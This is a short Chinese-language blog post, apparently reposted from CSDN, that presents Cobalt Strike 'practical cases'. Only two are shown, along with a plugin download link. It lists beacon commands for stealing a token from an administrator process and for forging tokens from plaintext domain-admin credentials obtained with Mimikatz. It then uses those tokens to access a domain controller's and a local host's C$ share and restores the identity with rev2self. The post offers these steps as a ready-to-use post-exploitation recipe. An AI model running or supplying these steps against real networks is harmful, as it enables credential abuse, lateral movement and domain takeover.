20个CobaltStrike实战案例 +插件

发布时间:2023年12月18日

案例 1:窃取 token,访问域控或者本地管理员?
前提:1.cs 上线的主机要管理员权限
注意点:登录失败时一定要先恢复身份
方式一:
?Ps #查看进程
steal_token 2020(管理元权限运行的进程号) ,
shell dir \\dc\c$ #利用刚刚窃取的 token 进行域控的访问测试
shell dir \\DESKTOP-VQJCIM1\c$ #利用刚刚窃取的 token 进行本地的访问测试
rev2self #还原恢复身份
方式二:目标-----进程列表

案例 2:制作 token,访问域控或者本地管理员?
前提:1.minikaz 获取到域控管理员的明文
方式一:
make_token test1\Administrator xxxx (域控明文
make_token .\Administrator xxx (本地明文
shell dir \\dc\c$ #利用刚刚制作的 token 进行域控的访问测试
shell dir \\DESKTOP-VQJCIM1\c$ #利用刚刚窃取的 token 进行本地的访问测试
rev2self #还原恢复身份
方式二:执行------制作令牌

插件下载地址:
https://github.com/xss-root/cobaltstrike_book/releases/tag/CobaltStrike%E6%8F%92%E4%BB%B6v1

文章来源:https://blog.csdn.net/2301_76786857/article/details/135055021
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。